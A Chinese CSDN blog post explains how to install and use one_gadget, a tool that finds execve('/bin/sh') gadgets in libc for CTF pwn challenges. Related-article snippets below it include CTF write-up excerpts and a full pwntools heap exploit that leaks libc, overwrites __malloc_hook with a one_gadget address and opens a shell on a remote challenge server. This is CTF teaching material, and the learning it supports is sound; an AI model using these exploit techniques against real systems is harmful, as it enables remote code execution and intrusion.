one_gadget的安装与使用

最新推荐文章于 2024-08-13 08:37:04 发布
最新推荐文章于 2024-08-13 08:37:04 发布
阅读量4.2k 收藏 9
点赞数 1
分类专栏: PWN工具的使用 文章标签: 安全 pwn linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62675330/article/details/123274386
版权

0x0 开始

当有了ROP_gadget之后就会发现one_gadget也是必须的。
没有ROP_gadget的赶快了。
ROP_gadget 下载安装与使用
one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职

one_gadget 是libc中存在的一些执行execve(“bin/sh",NULL,NULL)的片段。当我们知道libc的版本,并且通过信息泄露得到libc的基址,就可以通过控制EIP/RIP(
覆盖.got.plt或者函数的返回地址等)执行该gadget达到远程代码执行的目的。

0x1 安装

sudo apt -y install ruby
sudo gem install one_gadget

0x2 使用

举个栗子

在这里插入图片描述还是挺简单的。

coke_pwn
关注
专栏目录
one_gadget用法|攻防世界pwn进阶区babystack
Kni9hT's Blog
03-25 8392
文章目录0x00.检查保护 0x00.检查保护 devil@ubuntu:~/adworld/pwn$ checksec babystack [*] '/home/devil/adworld/pwn/babystack' Arch: amd64-64-little RELRO: Full RELRO ;无法修改got表 Stack: Canary fou...
安装one_gadget
liucc09的博客
01-09 916
install 卸载已有ruby和one_gadget sudo gem uninstall one_gadget sudo apt remove gem ruby 安装ruby-install wget -O ruby-install-0.8.1.tar.gz https://github.com/postmodern/ruby-install/archive/v0.8.1.tar.gz tar -xzvf ruby-install-0.8.1.tar.gz cd ruby-install-0.
one_gadget 工具指南:查找 libc 中的一句话利用 gadget
gitblog_00818的博客
08-13 865
one_gadget 工具指南:查找 libc 中的一句话利用 gadget one_gadgetThe best tool for finding one gadget RCE in libc.so.6项目地址:https://gitcode.com/gh_mirrors/on/one_gadget 1. 项目介绍 one_gadget 是一个用于寻找 Linux 可执行文件动态链接库 lib...
one_gadget使用
Jingged的博客
04-09 821
one_gadget是一个在二进制分析(尤其是利用分析)中常用的工具,它用于查找在给定二进制文件中可能存在的 "one-gadget" RCE(Remote Code Execution,远程代码执行)利用点。这些 "one-gadget" 通常指的是单个系统调用,当被正确利用时,能够直接赋予攻击者远程代码执行的能力,而无需链式利用多个漏洞。以下是使用one_gadget。
onegadget安装
sagic的博客
06-14 162
安装onegadget
one_gadget 工具安装使用教程
最新发布
gitblog_00415的博客
08-13 513
one_gadget 工具安装使用教程 one_gadgetThe best tool for finding one gadget RCE in libc.so.6项目地址:https://gitcode.com/gh_mirrors/on/one_gadget 1. 项目目录结构及介绍 one_gadget 是一个用于查找libc中的单个指令序列(也称为rop gadget)的工具,这些指...
ubuntu16.04 编译安装ruby环境、onegadget
Tw0的博客
01-24 1227
ubuntu16.04 安装one_gadget
ROP;CTF-pwn 详解writeup;one_gadget使用;静态库;静态链接
CHERRY_cong的博客
05-01 1264
ropme_writeup 文章目录ropme_writeup任务描述检查保护观察栈溢出地址实现系统调用ROPgadget任务一思路open(file,O_RDWR)read(4,addr,32)write(1,addr,32)exp1.py任务一运行截图任务二思路exp2.py任务二运行截图 任务描述 本实验提供了一个带有漏洞的二进制程序(ropme),这个二进制程序将你提供的文件名作为参数传入以后就会发生一个栈缓冲区溢出。请使用ROP方法编写利用,在不需要额外操作标准输入的情况下,完成以下至少一项任务
ROP;Ret2libc应用详解;CTF-pwn writeup;pwntools,one_gadget应用
CHERRY_cong的博客
05-01 673
ROP;Ret2libc; CTF-pwn题writeup;pwntools,one_gadget解题 pwn1 逆向代码 // IDA 7.5 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[48]; // [rsp+0h] [rbp-30h] BYREF init(); puts("Show me your code :D"); gets(buf, argv); return 0
有关One gadget 限制条件的问题
weixin_44864859的博客
07-21 506
在整理off-by-one漏洞利用的时候,偶然间发现在执行one gadget时,RSI不为NULL却可以获得shell的情况。这完全打破了我原有的认知,让我十分不解。下图是传参完毕各寄存器的状况: 再询问shiroha师傅后,对One gadget执行的限制条件有了新的认识。 首先来看看One gadget用到的执行函数execve( ) int execve(const char *filename, char *const argv[], char *const envp[]); execv
one_gadget
Trick的博客
11-27 570
[BJDCTF 2nd]one_gadget ida看main函数 再看init函数 会输出一个printf的地址 使用one_gadget,计算一下libc的基址 buuctf给了远程的libc文件,下载下来 one_gadget [libcfilename] exp: from pwn import * context.log_level='debug' p=remote('node3.buuoj.cn',25812) libc=ELF('./libc-2.29.so') p.recvunt
one_gadget:在libc.so.6中找到一个小工具RCE的最佳工具
02-05
小工具 在进行ctf pwn挑战时,我们通常需要一个小工具RCE(远程代码执行),这会导致调用execve('/bin/sh', NULL, NULL) 。 这个宝石提供了这种小工具查找器,无需像傻瓜一样每次都使用objdump或IDA-pro :winking_face: 要使用此工具,请在命令行中键入one_gadget /path/to/libc并享受其中的魔力 :grinning_squinting_face: 安装 在RubyGems.org上可用! $ gem install one_gadget 注意:需要ruby版本> = 2.1.0,可以使用ruby --version进行检查。 支持的架构 i386 amd64(x86-64) a
服务/软件管理:25---one_gadget的安装使用
董哥的黑板报
07-22 3655
一、安装 操作系统: Ubuntu 16.04 安装命令: sudo apt -y install ruby sudo gem install one_gadget
CTF-Pwn-[BJDCTF 2nd]one_gadget
归子莫的博客
05-06 1685
CTF-Pwn-[BJDCTF 2nd]one_gadget 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]one_gadget 下载题目的文件 one_gadget...
[BUUCTF]PWN——oneshot_tjctf_2016(one_gadget)
mcmuyanga的博客
02-01 843
oneshot_tjctf_2016 附件 步骤 例行检查,64位程序,开启了nx 本地试运行一下看看大概的情况 64位ida载入
[BJDCTF 2nd]one_gadget
weixin_45948183的博客
03-31 672
到ida看一下伪代码 函数输出了printf的地址,给了libc,利用one_gadget就可以的到libc的基址 这里需要自己试一下,这里是最后一个gadget from pwn import * p=remote('node3.buuoj.cn',25100) elf=ELF('./one_gadget') context.log_level='debug' libc = ELF('./l...
BJDCTF_ one_gadget
weixin_44864859的博客
04-09 343
考察点:one_gadget 题目给出了 printf 的地址,由此可算得 libc 基址,然后找 one_gadget、计算 libc 中 one_gadget 地址 printf("Give me your one gadget:"); __isoc99_scanf("%ld", &v4); v5 = v4; v4(); v4 是个函数指针,scanf 的时候把 on...
CTF-Pwn-[BJDCTF 2nd]one_gadget的wp
wuyvle的博客
02-06 179
64位,放进ida看看 看一看这个main方法,要我们输入一个gadget,然后它回打印出来,再来看看init方法 用onegadget看看libc one_gadget libc-2.29.so 发现 写脚本 from pwn import * r=remote("node3.buuoj.cn",27772) elf=ELF("./one_gadget") libc=ELF('libc-2.29.so') one_gadget1=[0xe237f,0xe2383,0xe2386,0x106ef
one_gadget不能搜索libc2.31及以上版本解决
qq_39153421的博客
04-14 869
更新ruby 首先卸载已有的ruby、onegadget: sudo gem uninstall one_gadget sudo apt remove gem ruby 下载ruby-install安装,由他来安装或升级ruby wget -O ruby-install-0.8.1.tar.gz https://github.com/postmodern/ruby-install/archive/v0.8.1.tar.gz tar -xzvf ruby-install-0.8.1.tar.gz cd ru
import os from pwn import * context(log_level='debug',os='linux',arch='amd64') # p = process('./1') p = remote("59.110.164.72",10027) #p = process(['/home/lin/tools/glibc-all-in-one-master/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so','./1'], env = {'LD_PRELOAD' : './libc-2.23.so'}) elf=ELF('./1') libc=ELF('./libc-2.23.so') def menu(choice):     p.sendlineafter(b"Your choice :",str(choice)) menu(1) def create(size,com):     menu(1)     # menu(1)     p.sendlineafter(b"Damage of skill : ",str(size))     p.sendlineafter(b"introduction of skill:",com) def edit_1(idx,size):     menu(2)     p.sendlineafter(b"Index :",str(idx))     p.sendlineafter(b"Damage of skill : ",str(size)) def edit_intro(idx,com):     menu(3)     p.sendlineafter(b"Index :",str(idx))     p.sendlineafter(b"introduction of skill : ",com) def show(idx):     menu(4)     p.sendlineafter(b"Index :",str(idx)) def delete(idx):     menu(5)     p.sendlineafter(b"Index :",str(idx)) create(0x38,b'a'*0x38) create(0x68,b'a'*0x68) create(0x68,b'a'*0x68) create(0x68,b'a'*0x68) # gdb.attach(p) delete(3) edit_intro(0,b"b"*0x38+b"\xb1") delete(1) create(0x40,b"") show(1) p.recvuntil("Introduction : ") libc_base = u64(p.recvuntil(b"\x7f").ljust(8,b"\x00"))-0x3c4c0a print (hex(libc_base)) malloc_hook = libc_base + libc.symbols['__malloc_hook']-0x23 print (hex(malloc_hook)) one = [0x45226,0x4527a,0xf03a4,0xf1247] one_gadget = libc_base + one[3] print (hex(one_gadget)) edit_intro(1,p64(0)*3+p64(0x71)+p64(malloc_hook)) delete(0) delete(1) create(0x68,b"d"*8) # gdb.attach(p,"b *0x400cda") # pause() create(0x68,b"a"*19+p64(one_gadget)) menu(6) menu(2) ## get_shell p.interactive()这串代码的知识点
06-01
这段代码主要使用pwntools 库来和程序...这个攻击使用了 libc 中的一些函数和常量,例如 malloc_hook 和 one_gadget。同时,攻击中还用到了 pwntools 库中的一些函数,例如 remote、sendlineafter 和 recvuntil。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值